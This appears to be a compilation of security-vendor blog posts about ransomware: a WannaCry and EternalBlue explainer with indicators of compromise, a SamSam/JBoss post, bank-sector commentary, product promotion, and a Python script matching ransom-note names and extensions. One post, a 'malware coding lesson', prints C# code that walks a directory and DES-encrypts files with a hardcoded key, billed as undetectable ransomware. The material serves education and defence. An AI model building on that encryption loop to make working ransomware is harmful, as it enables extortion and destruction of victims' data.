Once inside, most ransomware will scan the internal network to see which servers host file shares, attempt to connect to each share, encrypt its contents, and then demand a ransom be paid to regain access to the now-encrypted files. End users can usually access way more data than they should be able to: either through wide-open permissions or by accumulating permissions over the course of their employment at their company. Think for a minute just how often you’ve stumbled across a folder or files which you know you shouldn’t be able to access. Access controls are out of control. In this case, IT is typically blind because of the sheer complexity of file system permissions.

Good to know, but what was different last week?

Without going too much into the technical details, I can tell you that the code behind the biggest ransomware outbreak in history isn’t actually all that special. It’s a type of cryptoworm: a self-propagating form of malware. That means that once it gets a foothold, it can spread autonomously without the need for someone to remote control it.

Normally, ransomware targets unstructured data hosted on file shares – this ransomware, however, did not discriminate.

In April, several hacking tools created by the NSA were leaked online. These hacking tools exploit vulnerabilities in hardware and software so that they can hack into or move laterally around a computer network.

WannaCry ransomware (also known as WCry / WanaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r) – the type responsible for last Friday’s attack – went a few steps further: once it got onto even a single machine within a corporate network, it did the following:

  • Looped through any open RDP (Remote Desktop) sessions, to encrypt data on the remote machine
  • Sought out any vulnerable* Windows machines – endpoints (laptops/desktops/tablets) and servers using Microsoft vulnerabilities
  • Used the traditional approach of going after file shares directly from the endpoint

*The particular vulnerability that made the difference last week was in the Microsoft SMBv1 file sharing protocol, which was used to hop from machine to machine encrypting data – like a spider web effect. Most internal servers are separated on internal networks so that end users can’t access them. The cryptoworm would need to hit just one internal server (e.g. a file server) and from there it would target whatever vulnerable servers that file server can access. This allowed it to quickly traverse entire networks, effectively crippling many of them. Like many cryptoworms, it’s self-propagating and so replicates itself and searches out to other vulnerable hosts/computer networks worldwide.

The truth is that the worldwide infection could have been much worse if not for the quick thinking of a security researcher. @MalwareTechBlog spotted that the malware code was connecting out to a nonsensical domain, which was not registered. This call out was hard-coded in case the creator wanted to stop it and likely also to help avoid IDS/IPS sandboxing techniques. If the request comes back showing that the domain is live, the “kill switch” kicks in to stop the malicious part of the code from executing – effectively stopping the malware in its tracks. @MalwareTechBlog, acting on a hunch, registered the domain name and immediately saw thousands of connections registering every second. The result was that he stopped what could have been a much wider infection.

The bad news is that new versions of the code are already in development: https://www.bleepingcomputer.com/news/security/with-the-success-of-wannacry-imitations-are-quickly-in-development/

Lessons Learned

Microsoft released a patch (software code update to fix vulnerabilities) for this particular SMBv1 vulnerability back in March. The sad truth of the matter is that proper vulnerability patch management processes would mean that most organizations would not have been so badly affected.

That’s not to say that vulnerability patch management processes are enough coverage for ransomware. Nor are backups, since some ransomware will hide in your backups so that after you restore files they will simply attack again.

There is no one stop shop for stopping ransomware infections or any cyber security threat for that matter. Security is all about risk reduction – and requires a layered approach with controls in place at each layer while leveraging solutions to automate processes wherever possible. If any organization says that they’re 100% safe from cyber-attacks, then they’re either delusional or telling you porky pies!

🚨 Massive Ransomware Outbreak: What You Need To Know

Remember those NSA exploits that got leaked a few months back? A new variant of ransomware using those exploits is spreading quickly across the world – affecting everyone from the NHS to telecom companies to FedEx.

Here’s What We Know So Far

Ransomware appears to be getting in via social engineering and phishing attacks, though vulnerable systems may also be at risk if TCP port 445 is accessible. Unlike most ransomware, which encrypts any accessible file from a single infected node, this ransomware also moves laterally via exploit (i.e., EternalBlue) to vulnerable unpatched workstations and servers, and then continues the attack. Unpatched Windows hosts (Vista, 7, 8, 10, Server 2008, 2008 R2, 2012, 2012 R2, and 2016) running SMB v1 are all vulnerable.

Infected hosts are running strains of ransomware, such as Wanna Decrypt0r (more below), that encrypt files and change their extensions to:

  • .WRNY
  • .WCRY (+ .WCRYT for temp files)
  • .WNCRY (+ .WNCRYT for temp files)

The ransomware also leaves a note in files named @Please_Read_Me@.txt or !Please_Read_Me!.txt, and will display an onscreen warning.

Here’s What You Can Do

MS17-010, released in March, closes a number of holes in Windows SMB Server. These exploits were all exposed in the recent NSA hacking tools leak. Exploit tools such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance (all part of the Fuzzbunch exploit platform) all drop DoublePulsar onto compromised hosts. DoublePulsar was created by the NSA and is basically a malware downloader, which is used as an intermediary for downloading more potent malware executables onto infected hosts.

If you’re an existing DatAlert customer, you can set up office hours with your assigned engineer to review your threat models and alerts. Don’t have DatAlert yet?  Get a demo of our data security platform and see how to detect zero-day attacks.

DatAlert Customers

If you’re a DatAlert Analytics customer, the threat model “Immediate Pattern Detected: user actions resemble ransomware” was designed to detect this and other zero-day variants of ransomware; however, we also strongly recommend that you update the dictionaries used by DatAlert signature-based rules. Instructions for updating your dictionaries are here: https://connect.varonis.com/docs/DOC-2749

If for some reason you can’t access the connect community, here is how to update your dictionaries to include the new extensions for this variant:

Open the DatAdvantage UI > Tools > Dictionaries > Crypto files (Predefined)

Open the DatAdvantage UI > Tools > Dictionaries > Encrypted files (Predefined)



The Malware exploits multiple Windows SMBv1 Remote Code vulnerabilities:

Windows Vista, 7, 8, 10, Server 2008, 2008 R2, 2012, 2012 R2, and 2016 are all vulnerable if not patched and the SMBv1 Windows feature is enabled.


Ransomware strains

WCry / WannaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r

This outbreak is version 2.0 of the WCry ransomware, which first appeared in March. Until this outbreak, this ransomware family was barely heard of. Though likely spread via phishing and social engineering attacks, if TCP port 445 is exposed on vulnerable Windows machines, it could be exploited using the Fuzzbunch exploit platform.

Planet Ransomware

If you were expecting a quiet Friday in terms of cyberattacks, this ain’t it. There are reports of a massive ransomware attack affecting computers on a global scale: in the UK, Spain, Russia, Ukraine, Japan, and Taiwan.

The ransomware variant that’s doing the damage is called WCry, also known as WannaCry or WanaCrypt0r. It has so far claimed some high-profile targets, including NHS hospitals in the UK, and telecom and banking companies in Spain.

Be calm and carry on, of course.

In the blog, we’ve been writing about ransomware over the last two years, and we have great educational resources to help you prevent or reduce the damage of an attack.

Here’s a quick overview of our content.

What is it?

Our ransomware guide: https://www.varonis.com/blog/the-complete-ransomware-guide/ 

Learning more

The Troy Hunt course: https://www.varonis.com/blog/introduction-to-ransomware-course/

How it spreads

Yes, it can have worm-like features: https://www.varonis.com/blog/next-gen-ransomware-ransomworm-gets-deadlier/

Can I make my own (for research purposes)?

Yes, but only under adult supervision:



Reducing the risk

Limiting file access really, really helps: https://www.varonis.com/blog/the-best-ransomware-defense-dont-have-files/

Legal and Regulatory Implications

For US companies, this is what you need to know: https://www.varonis.com/blog/ransomware-the-legal-cheat-sheet-for-breach-notification/

Should you pay?

It depends:



Is a decryption solution available?

Check here: https://www.varonis.com/ransomware-identifier/

The ultimate answer to ransomware

User Behavior Analytics (UBA): https://www.varonis.com/blog/why-uba-will-catch-the-zero-day-ransomware-attacks-that-endpoint-protection-cant/

And here’s proof:  https://www.varonis.com/ransomware-solutions




Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. If the unfortunate victim wants to recover them, he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by the hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files’ contents with a public key, but using a different private key that only the attacker has for decryption. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as a symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that implements a symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathnames, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The files to be encrypted are usually the ones companies depend on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to their size and the impact on the malware’s performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer (when there’s CPU available) and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like; remember that we are going to use a symmetric algorithm, so the same key will be used for encrypting and decrypting.

Second snippet:   Encrypt an entire directory contents:

private static void EncryptDir(string d, int mili)
{
    DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
    FileInfo[] file = dirtoencrypt.GetFiles();
    foreach (FileInfo currentFile in file)
    {
        // Executables are skipped; every other file gets an encrypted .axx copy written next to it
        if (currentFile.Extension.ToLower() != ".exe")
        {
            string key = "R?\n??i??";
            EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);
        }
    }
}


Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

// Requires: using System.IO; using System.Security.Cryptography; using System.Text;
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
{
    FileStream fsInput = new FileStream(sInputFilename, FileMode.Open, FileAccess.Read);
    FileStream fsEncrypted = new FileStream(sOutputFilename, FileMode.Create, FileAccess.Write);
    DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
    // The MSDN sample reuses the same 8-byte string as both key and IV (a weakness in its own right)
    DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
    DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
    ICryptoTransform desencrypt = DES.CreateEncryptor();
    CryptoStream cryptostream = new CryptoStream(fsEncrypted, desencrypt, CryptoStreamMode.Write);
    // Read the whole input file into memory and push it through the DES stream
    byte[] bytearrayinput = new byte[fsInput.Length];
    fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
    cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);
    cryptostream.Close();
    fsInput.Close();
    fsEncrypted.Close();
}


That’s it!

A malicious tool with tons of damage potential in fewer than 100 lines of code and under 10 KB after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability

One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBoss — yes, everything starts with a J. Unfortunately, by default, the JMX home page is available externally without any authentication checks.

Like any good admin tool, JMX gives you access to some basic functions including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole – the CVE dates back to 2010—and it has since been patched.

But it has come back into the limelight because the SamSam ransomware has very successfully used it against healthcare orgs, which for whatever reason are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.


It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as a starting point for uploading and launching other software, say a reverse shell. So the vulnerability leaves open other attacks, not necessarily ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp!— waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!


One Take Away from Black Hat 2016: Designer Ransomware!

We had an amazing week at Black Hat 2016. One topic that was on attendees’ minds— besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransom and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers’ improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on a UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.



Banks Secretly and Silently Struggling with Ransomware

“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”


If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could potentially create panic amongst customers, leading to a bank run. Customers might decide to withdraw cash from a financial institution, destabilizing the bank to the point where it runs out of cash and unexpectedly faces bankruptcy. The result of this scenario would be – from an economic standpoint – catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on your workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations from all verticals to prevent ransomware. And here are a few quotes from a few financial institutions that describe their experience with how Varonis helps them stop and prevent ransomware:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware.” – A Major Bank in Western Canada



How to Identify Ransomware: Use Our New Identification Tool

Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of damage and then attempting recovery operations.

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.

While restoring files from backup is the best recovery option, often you’re still left with files that were created since the last backup was taken or, in cases where the infection wasn’t promptly caught, with backups that already contain the files encrypted by the ransomware.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now
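The identification step above, and the WannaCry indicators listed earlier on this page (the encrypted-file extensions, their temp-file variants, and the two ransom-note names), come together in this added Python example. It is not the Ransomware Identifier itself and not Varonis code. It walks a directory tree, matches file names against an indicator table, weighs a ransom note more heavily than a single extension, and strips the ransomware extension so each file can be matched to its backup copy. The WannaCry entries are exactly the ones the article prints (including the ".WRNY" spelling as given); the second table entry is a constructed placeholder that only shows where another family would be added, and the sample victim directory is built in a temp folder from empty files.

```python
"""Identify a ransomware strain from encrypted-file extensions and ransom-note
names found on disk. Added example, not Varonis code. The WannaCry indicators
are the ones the article lists; the second entry is a constructed placeholder."""
import os
import tempfile
from collections import Counter, defaultdict

INDICATORS = {
    "WannaCry": {
        "encrypted": {".wncry", ".wcry", ".wrny"},
        "temp": {".wncryt", ".wcryt"},
        "note": {"@please_read_me@.txt", "!please_read_me!.txt"},
    },
    "EXAMPLE-STRAIN-PLACEHOLDER": {          # constructed, not a real family
        "encrypted": {".example-locked"},
        "temp": set(),
        "note": {"how_to_recover_example.txt"},
    },
}


def classify_name(filename):
    """Return (strain, kind) with kind in {"note", "temp", "encrypted"}, or None."""
    name = filename.lower()
    ext = os.path.splitext(name)[1]
    for strain, ind in INDICATORS.items():
        if name in ind["note"]:
            return strain, "note"
        if ext in ind["temp"]:
            return strain, "temp"
        if ext in ind["encrypted"]:
            return strain, "encrypted"
    return None


def original_name(filename):
    """Strip the ransomware extension so the file can be matched against a backup."""
    c = classify_name(filename)
    if c is None or c[1] == "note":
        return filename
    return filename[: filename.rfind(".")]


def scan_tree(root):
    """Walk a tree and count indicator hits per strain and kind."""
    hits = defaultdict(Counter)
    for _dirpath, _dirs, files in os.walk(root):
        for f in files:
            c = classify_name(f)
            if c is not None:
                hits[c[0]][c[1]] += 1
    return hits


def identify(hits):
    """Strain with the most evidence; a ransom note weighs more than one extension."""
    best, best_score = None, 0
    for strain, counter in hits.items():
        score = counter["encrypted"] + counter["temp"] + 10 * counter["note"]
        if score > best_score:
            best, best_score = strain, score
    return best


def build_sample_tree():
    """Create a constructed victim directory in a temp dir (empty files suffice)."""
    root = tempfile.mkdtemp(prefix="rw-sample-")
    sub = os.path.join(root, "finance")
    os.makedirs(sub)
    names = ["q1.xlsx.WNCRY", "q2.xlsx.WNCRY", "budget.docx.WNCRYT",
             "@Please_Read_Me@.txt", "readme.txt"]
    for n in names:
        open(os.path.join(sub, n), "w").close()
    open(os.path.join(root, "notes.txt.wcry"), "w").close()
    return root


if __name__ == "__main__":
    hits = scan_tree(build_sample_tree())
    print({k: dict(v) for k, v in hits.items()}, "->", identify(hits))
```

Matching is case-insensitive because the extensions appear in both upper and lower case in the wild, and temp-file extensions are counted separately because a .WNCRYT file left behind usually means the encryption run was interrupted mid-file, which is worth knowing before you start restoring.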